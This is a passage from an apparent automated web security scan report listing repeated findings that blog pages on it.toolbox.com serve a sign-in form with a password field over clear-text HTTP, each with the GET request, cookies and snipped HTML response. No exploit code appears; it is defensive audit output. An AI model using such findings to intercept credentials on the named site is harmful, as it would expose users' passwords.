Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 70278
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- &lt=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:46:12 GMT; path=/
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:46:12 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Elementary
...[SNIP]...
</div>
<form name="aspnetForm" method="post" action="/blogs/ppmtoday/elementary-school-and-saas-38160" id="aspnetForm">
<div>
...[SNIP]...
<div><input name="ctl00$ctl00$m$txtSignin_Password" type="password" id="ctl00_ctl00_m_txtSignin_Password" tabindex="901" class="signin-textbox" defaultButton="&lt;% =btnSignIn.ClientID %>" /></div>
...[SNIP]...

4.32. http://it.toolbox.com/blogs/ppmtoday/it-starts-with-data-40018  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /blogs/ppmtoday/it-starts-with-data-40018

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /blogs/ppmtoday/it-starts-with-data-40018 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 72957
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- &lt=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:45:31 GMT; path=/
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:45:30 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   It Starts W
...[SNIP]...
</div>
<form name="aspnetForm" method="post" action="/blogs/ppmtoday/it-starts-with-data-40018" id="aspnetForm">
<div>
...[SNIP]...
<div><input name="ctl00$ctl00$m$txtSignin_Password" type="password" id="ctl00_ctl00_m_txtSignin_Password" tabindex="901" class="signin-textbox" defaultButton="&lt;% =btnSignIn.ClientID %>" /></div>
...[SNIP]...

4.33. http://it.toolbox.com/blogs/ppmtoday/key-success-factorswho-needs-em-42168  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /blogs/ppmtoday/key-success-factorswho-needs-em-42168

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /blogs/ppmtoday/key-success-factorswho-needs-em-42168 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 72699
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- &lt=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:44:28 GMT; path=/
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:44:28 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Key Success
...[SNIP]...
</div>
<form name="aspnetForm" method="post" action="/blogs/ppmtoday/key-success-factorswho-needs-em-42168" id="aspnetForm">
<div>
...[SNIP]...
<div><input name="ctl00$ctl00$m$txtSignin_Password" type="password" id="ctl00_ctl00_m_txtSignin_Password" tabindex="901" class="signin-textbox" defaultButton="&lt;% =btnSignIn.ClientID %>" /></div>
...[SNIP]...

4.34. http://it.toolbox.com/blogs/ppmtoday/life-cycles-40815  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /blogs/ppmtoday/life-cycles-40815

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /blogs/ppmtoday/life-cycles-40815 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 68279
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- &lt=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:44:34 GMT; path=/
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:44:33 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Life Cycles
...[SNIP]...
</div>
<form name="aspnetForm" method="post" action="/blogs/ppmtoday/life-cycles-40815" id="aspnetForm">
<div>
...[SNIP]...
<div><input name="ctl00$ctl00$m$txtSignin_Password" type="password" id="ctl00_ctl00_m_txtSignin_Password" tabindex="901" class="signin-textbox" defaultButton="&lt;% =btnSignIn.ClientID %>" /></div>
...[SNIP]...

4.35. http://it.toolbox.com/blogs/ppmtoday/making-the-case-43129  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /blogs/ppmtoday/making-the-case-43129

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /blogs/ppmtoday/making-the-case-43129 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 73965
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- &lt=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:44:26 GMT; path=/
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:44:25 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Making The
...[SNIP]...
</div>
<form name="aspnetForm" method="post" action="/blogs/ppmtoday/making-the-case-43129" id="aspnetForm">
<div>
...[SNIP]...
<div><input name="ctl00$ctl00$m$txtSignin_Password" type="password" id="ctl00_ctl00_m_txtSignin_Password" tabindex="901" class="signin-textbox" defaultButton="&lt;% =btnSignIn.ClientID %>" /></div>
...[SNIP]...

4.36. http://it.toolbox.com/blogs/ppmtoday/micracle-free-37832  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /blogs/ppmtoday/micracle-free-37832

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /blogs/ppmtoday/micracle-free-37832 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 66943
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- &lt=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:46:12 GMT; path=/
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:46:12 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Micracle Fr
...[SNIP]...
</div>
<form name="aspnetForm" method="post" action="/blogs/ppmtoday/micracle-free-37832" id="aspnetForm">
<div>
...[SNIP]...
<div><input name="ctl00$ctl00$m$txtSignin_Password" type="password" id="ctl00_ctl00_m_txtSignin_Password" tabindex="901" class="signin-textbox" defaultButton="&lt;% =btnSignIn.ClientID %>" /></div>
...[SNIP]...

4.37. http://it.toolbox.com/blogs/ppmtoday/monthly/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /blogs/ppmtoday/monthly/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /blogs/ppmtoday/monthly/ HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 50524
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:44:23 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Future Stat
...[SNIP]...
</div>
<form name="aspnetForm" method="post" action="/blogs/ppmtoday/monthly/" id="aspnetForm">
<div>
...[SNIP]...
<div><input name="ctl00$ctl00$m$txtSignin_Password" type="password" id="ctl00_ctl00_m_txtSignin_Password" tabindex="901" class="signin-textbox" defaultButton="&lt;% =btnSignIn.ClientID %>" /></div>
...[SNIP]...

4.38. http://it.toolbox.com/blogs/ppmtoday/plowing-sideways-43376  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /blogs/ppmtoday/plowing-sideways-43376

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /blogs/ppmtoday/plowing-sideways-43376 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 67827
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- &lt=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:44:25 GMT; path=/
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:44:24 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Plowing Sid
...[SNIP]...
</div>
<form name="aspnetForm" method="post" action="/blogs/ppmtoday/plowing-sideways-43376" id="aspnetForm">
<div>
...[SNIP]...
<div><input name="ctl00$ctl00$m$txtSignin_Password" type="password" id="ctl00_ctl00_m_txtSignin_Password" tabindex="901" class="signin-textbox" defaultButton="&lt;% =btnSignIn.ClientID %>" /></div>
...[SNIP]...

4.39. http://it.toolbox.com/blogs/ppmtoday/roadmap-process-38207  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /blogs/ppmtoday/roadmap-process-38207

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /blogs/ppmtoday/roadmap-process-38207 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 73552
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- &lt=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:46:12 GMT; path=/
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:46:11 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Roadmap Pro
...[SNIP]...
</div>
<form name="aspnetForm" method="post" action="/blogs/ppmtoday/roadmap-process-38207" id="aspnetForm">
<div>
...[SNIP]...
<div><input name="ctl00$ctl00$m$txtSignin_Password" type="password" id="ctl00_ctl00_m_txtSignin_Password" tabindex="901" class="signin-textbox" defaultButton="&lt;% =btnSignIn.ClientID %>" /></div>
...[SNIP]...

4.40. http://it.toolbox.com/blogs/ppmtoday/saas-marches-on-38509  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /blogs/ppmtoday/saas-marches-on-38509

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /blogs/ppmtoday/saas-marches-on-38509 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 66827
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- &lt=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:46:09 GMT; path=/
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:46:09 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   SaaS marche
...[SNIP]...
</div>
<form name="aspnetForm" method="post" action="/blogs/ppmtoday/saas-marches-on-38509" id="aspnetForm">
<div>
...[SNIP]...
<div><input name="ctl00$ctl00$m$txtSignin_Password" type="password" id="ctl00_ctl00_m_txtSignin_Password" tabindex="901" class="signin-textbox" defaultButton="&lt;% =btnSignIn.ClientID %>" /></div>
...[SNIP]...

4.41. http://it.toolbox.com/blogs/ppmtoday/talent-curves-40195  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /blogs/ppmtoday/talent-curves-40195

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /blogs/ppmtoday/talent-curves-40195 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 85703
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- &lt=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:44:35 GMT; path=/
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:44:34 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Talent Curv
...[SNIP]...
</div>
<form name="aspnetForm" method="post" action="/blogs/ppmtoday/talent-curves-40195" id="aspnetForm">
<div>
...[SNIP]...
<div><input name="ctl00$ctl00$m$txtSignin_Password" type="password" id="ctl00_ctl00_m_txtSignin_Password" tabindex="901" class="signin-textbox" defaultButton="&lt;% =btnSignIn.ClientID %>" /></div>
...[SNIP]...

4.42. http://it.toolbox.com/blogs/ppmtoday/technical-debt-revisiited-38720  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /blogs/ppmtoday/technical-debt-revisiited-38720

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /blogs/ppmtoday/technical-debt-revisiited-38720 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 75502
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- &lt=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:46:08 GMT; path=/
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:46:08 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Technical D
...[SNIP]...
</div>
<form name="aspnetForm" method="post" action="/blogs/ppmtoday/technical-debt-revisiited-38720" id="aspnetForm">
<div>
...[SNIP]...
<div><input name="ctl00$ctl00$m$txtSignin_Password" type="password" id="ctl00_ctl00_m_txtSignin_Password" tabindex="901" class="signin-textbox" defaultButton="&lt;% =btnSignIn.ClientID %>" /></div>
...[SNIP]...

4.43. http://it.toolbox.com/blogs/ppmtoday/the-check-box-how-flaky-practices-get-encoded-into-your-business-42620  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /blogs/ppmtoday/the-check-box-how-flaky-practices-get-encoded-into-your-business-42620

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /blogs/ppmtoday/the-check-box-how-flaky-practices-get-encoded-into-your-business-42620 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 69302
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- &lt=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:44:27 GMT; path=/
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:44:27 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   The Check B
...[SNIP]...
</div>
<form name="aspnetForm" method="post" action="/blogs/ppmtoday/the-check-box-how-flaky-practices-get-encoded-into-your-business-42620" id="aspnetForm">
<div>
...[SNIP]...
<div><input name="ctl00$ctl00$m$txtSignin_Password" type="password" id="ctl00_ctl00_m_txtSignin_Password" tabindex="901" class="signin-textbox" defaultButton="&lt;% =btnSignIn.ClientID %>" /></div>
...[SNIP]...

4.44. http://it.toolbox.com/blogs/ppmtoday/the-emergent-comedy-39924  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /blogs/ppmtoday/the-emergent-comedy-39924

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /blogs/ppmtoday/the-emergent-comedy-39924 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 68773
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- &lt=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:45:35 GMT; path=/
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:45:35 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   The Emergen
...[SNIP]...
</div>
<form name="aspnetForm" method="post" action="/blogs/ppmtoday/the-emergent-comedy-39924" id="aspnetForm">
<div>
...[SNIP]...
<div><input name="ctl00$ctl00$m$txtSignin_Password" type="password" id="ctl00_ctl00_m_txtSignin_Password" tabindex="901" class="signin-textbox" defaultButton="&lt;% =btnSignIn.ClientID %>" /></div>
...[SNIP]...

4.45. http://it.toolbox.com/blogs/ppmtoday/the-wocket-in-your-pocket-42008  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /blogs/ppmtoday/the-wocket-in-your-pocket-42008

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /blogs/ppmtoday/the-wocket-in-your-pocket-42008 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 69404
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- &lt=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:44:31 GMT; path=/
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:44:30 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   The Wocket
...[SNIP]...
</div>
<form name="aspnetForm" method="post" action="/blogs/ppmtoday/the-wocket-in-your-pocket-42008" id="aspnetForm">
<div>
...[SNIP]...
<div><input name="ctl00$ctl00$m$txtSignin_Password" type="password" id="ctl00_ctl00_m_txtSignin_Password" tabindex="901" class="signin-textbox" defaultButton="&lt;% =btnSignIn.ClientID %>" /></div>
...[SNIP]...

4.46. http://it.toolbox.com/blogs/ppmtoday/two-old-pals-41071  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /blogs/ppmtoday/two-old-pals-41071

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /blogs/ppmtoday/two-old-pals-41071 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 68626
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- &lt=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:44:33 GMT; path=/
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:44:33 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Two Old Pal
...[SNIP]...
</div>
<form name="aspnetForm" method="post" action="/blogs/ppmtoday/two-old-pals-41071" id="aspnetForm">
<div>
...[SNIP]...
